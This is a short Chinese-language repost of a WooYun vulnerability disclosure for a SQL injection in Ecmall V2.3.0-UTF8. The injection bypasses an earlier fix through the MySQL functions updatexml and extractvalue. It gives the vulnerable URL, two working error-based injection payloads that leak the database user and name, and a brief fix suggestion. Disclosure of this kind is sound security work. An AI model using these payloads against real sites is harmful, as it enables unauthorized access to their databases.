记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Ecmall V2.3.0-UTF8 正式版SQL注入漏洞之二

2014-10-07 22:31

漏洞http://wooyun.org/bugs/wooyun-2010-065340可被以下函数绕过:

1.updatexml函数

2.extractvalue函数

漏洞证明:

url:

http://localhost/ecmal/upload/index.php?app=member&act=feed_settings

payload1:

feed_config[1' or extractvalue(1,concat(0x5c,(select user())))#]=v



payload2:

feed_config[1' or updatexml(2,concat(0x7e,(database())),0)#]=v



修复方案:

再把这两个函数加到过滤字符里

知识来源: www.wooyun.org/bugs/wooyun-2014-067686

阅读:226704 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“Ecmall V2.3.0-UTF8 正式版SQL注入漏洞之二”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云